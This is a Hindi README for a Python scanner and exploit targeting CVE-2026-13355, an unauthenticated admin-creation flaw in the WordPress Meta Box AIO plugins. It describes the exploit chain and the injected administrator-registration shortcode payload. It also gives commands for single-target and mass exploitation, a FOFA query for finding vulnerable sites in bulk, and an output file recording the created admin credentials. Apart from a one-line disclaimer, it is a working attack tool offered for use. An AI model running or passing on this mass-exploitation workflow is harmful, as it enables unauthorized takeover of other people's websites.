
Python PoC स्कैनर और CVE-2026-13355 के लिए एक्सप्लॉइट, जो Meta Box AIO WordPress प्लगइन्स में एक अनधिकृत एडमिन प्रिविलेज एस्केलेशन है, साथ में FOFA मास स्कैनिंग।
WordPress बंडल Meta Box AIO (और संबंधित MB Frontend Submission / MB User Profile एक्सटेंशन) में CVE-2026-13355 के लिए Python 3 प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर और एक्सप्लॉइट।
| प्लेटफ़ॉर्म | WordPress प्लगइन |
| घटक | Meta Box AIO |
| प्रभावित | Meta Box AIO ≤ 3.11.0; MB Frontend Submission ≤ 4.5.6; MB User Profile ≤ 3.11.0 |
| में ठीक किया गया | Meta Box AIO 3.12.0+ (Form::process() प्राधिकरण) |
| CVSS | 9.8 Critical |
| प्रमाणीकरण | अनधिकृत |
| CWE | CWE-269 — अनुचित विशेषाधिकार प्रबंधन |
| शोधकर्ता | h0xilo (Wordfence) |
दो बंडल किए गए एक्सटेंशन में श्रृंखलाबद्ध त्रुटियाँ अनधिकृत प्रशासक खाता निर्माण की अनुमति देती हैं:
mbfs) — rwmb_frontend_field_object_id बिना प्रमाणीकरण के फ़ॉर्म लक्ष्य को ओवरराइड करता है; Form::process() में user_can_edit() छूट गया है, इसलिए हमलावर wp_update_post() कर सकते हैं और मनमाने पोस्ट/पेजों पर post_content को ओवरराइट कर सकते हैं।mbup) — इंजेक्ट किए गए [mb_user_profile_register role="administrator" auto_login="true"] शॉर्टकोड एट्रिब्यूट्स को बिना भूमिका सत्यापन के विश्वसनीय माना जाता है।महत्वपूर्ण: एक्सप्लॉइट श्रृंखला के लिए एक सार्वजनिक mbfs (फ्रंटएंड सबमिशन) फ़ॉर्म आवश्यक है, न कि केवल-लॉगिन mbup फ़ॉर्म। कई FOFA हिट केवल mbup लॉगिन/रजिस्टर UI को उजागर करते हैं — उन्हें plugin_mbup_only के रूप में चिह्नित किया जाता है, इस श्रृंखला के माध्यम से शोषणीय नहीं।
pip install -r requirements.txtpip install -r requirements.txt
# Single target — check (live terminal flow by default)
python poc.py -u https://target.example --mode check
# Mass check (one line per target unless --quiet)
python poc.py --list targets.example.txt --mode check --threads 20
# Single target — exploit (needs mbfs form URL + post ID)
python poc.py -u https://target.example --mode exploit \
--form-url /contact/ --object-id 12 --verify
# Mass exploit from check output
python poc.py --list candidates.jsonl --mode exploit --threads 5 --verify
उदाहरण क्वेरी:
body="/wp-content/plugins/meta-box-aio/"
FOFA CSV निर्यात को सामान्य करें:
python fofa_to_list.py -i fofa_export.csv
# writes list.txt + normalized CSV (local only, gitignored)
python poc.py --list list.txt --mode check --threads 20
exploit रन पर --vuln-list exploited.txt का उपयोग करें ताकि hits.txt में check हिट ओवरराइट न हों।
status मान जाँचें?rwmb_frontend_field_object_id=<id> के साथ एक mbfs फ़ॉर्म के माध्यम से post_content को POST करता है।mbfs फ़ॉर्म में अक्सर वास्तविक post_content फ़ील्ड नहीं होता; व्यवहार में ओवरराइट अभी भी विफल हो सकता है।.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore
स्थानीय स्कैन सूचियाँ और रन आर्टिफ़ैक्ट (list.txt, fofa*.csv, *.jsonl, hits*.txt, …) .gitignore में हैं और इन्हें कमिट नहीं किया जाना चाहिए।
केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। लागू कानूनों और कार्यक्रम नियमों के अनुपालन की जिम्मेदारी आपकी है।
| विकल्प | विवरण |
|---|
-u, --url | एकल आधार URL |
--list | URL सूची, FOFA-सामान्यीकृत CSV (url कॉलम), या candidates.jsonl |
--mode | check या exploit |
--form-url | [mb_frontend_form ...] / mbfs-form वाला पेज |
--object-id | rwmb_frontend_field_object_id के लिए पोस्ट/पेज ID |
--paths | फ्रंटएंड फ़ॉर्म के लिए क्रॉल करने के अतिरिक्त पथ |
--username, --email, --password | पंजीकरण क्रेडेंशियल (exploit) |
--shortcode | इंजेक्ट किया गया post_content पेलोड (डिफ़ॉल्ट एडमिन रजिस्टर शॉर्टकोड) |
--verify | पंजीकरण के बाद /wp-admin/ या wp-login.php के माध्यम से पुष्टि करें |
--flow | मास रन पर प्रति लक्ष्य एक पंक्ति स्ट्रीम करें (--list के साथ डिफ़ॉल्ट) |
--no-flow | केवल प्रगति सारांश |
--quiet, -q | न्यूनतम कंसोल आउटपुट |
--threads, -j | मास कंकरेंसी (डिफ़ॉल्ट 15) |
--output | JSONL लॉग (डिफ़ॉल्ट cve_2026_13355_results.jsonl) |
--vuln-list | टेक्स्ट हिट / शोषित पंक्तियाँ (डिफ़ॉल्ट hits.txt / exploit के लिए exploited.txt उपयोग करें) |
--candidates-list | मेटाडेटा JSONL जाँचें (डिफ़ॉल्ट candidates.jsonl) |
| फ़ाइल | मोड | सामग्री |
|---|
cve_2026_13355_results.jsonl | दोनों | प्रति लक्ष्य पूर्ण JSON |
hits.txt | check | candidate_mbfs वाले URL |
candidates.jsonl | check | form_url, object_id, संस्करण संकेत |
exploited.txt | exploit | url|user|email|pass|oid=… |
| स्थिति | अर्थ |
|---|
candidate_mbfs | प्लगइन मौजूद + MB Frontend Submission फ़ॉर्म मिला (exploit संभव हो सकता है) |
plugin_mbup_only | केवल User Profile लॉगिन/रजिस्टर फ़ॉर्म — यह CVE श्रृंखला नहीं |
plugin_no_frontend_forms | प्लगइन फ़िंगरप्रिंट, कोई rwmb फ्रंटएंड फ़ॉर्म नहीं मिला |
patched | संस्करण प्रभावित सीमा से ऊपर (जब पठनीय हो) |
no_plugin | Meta Box AIO / एक्सटेंशन नहीं पाए गए |